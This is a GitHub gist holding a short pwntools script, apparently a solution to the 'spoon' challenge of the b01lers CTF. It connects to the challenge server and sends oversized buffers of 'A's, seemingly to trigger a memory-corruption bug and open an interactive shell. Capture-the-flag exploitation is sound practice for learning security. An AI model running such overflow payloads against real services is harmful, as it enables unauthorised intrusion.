Skip to content

Instantly share code, notes, and snippets.

@hkraw
Created October 4, 2020 13:53
Show Gist options
  • Save hkraw/b3a6cd0d56e4c069436d22d3e9ddb309 to your computer and use it in GitHub Desktop.
Save hkraw/b3a6cd0d56e4c069436d22d3e9ddb309 to your computer and use it in GitHub Desktop.
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
if __name__ == '__main__':
# io = process('./spoon')
io = remote('chal.ctf.b01lers.com',1006)
matrix = '\x00'+'A'*255
io.sendafter('your matrix: ',matrix)
io.sendafter('choice: ','A'*0x50)
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment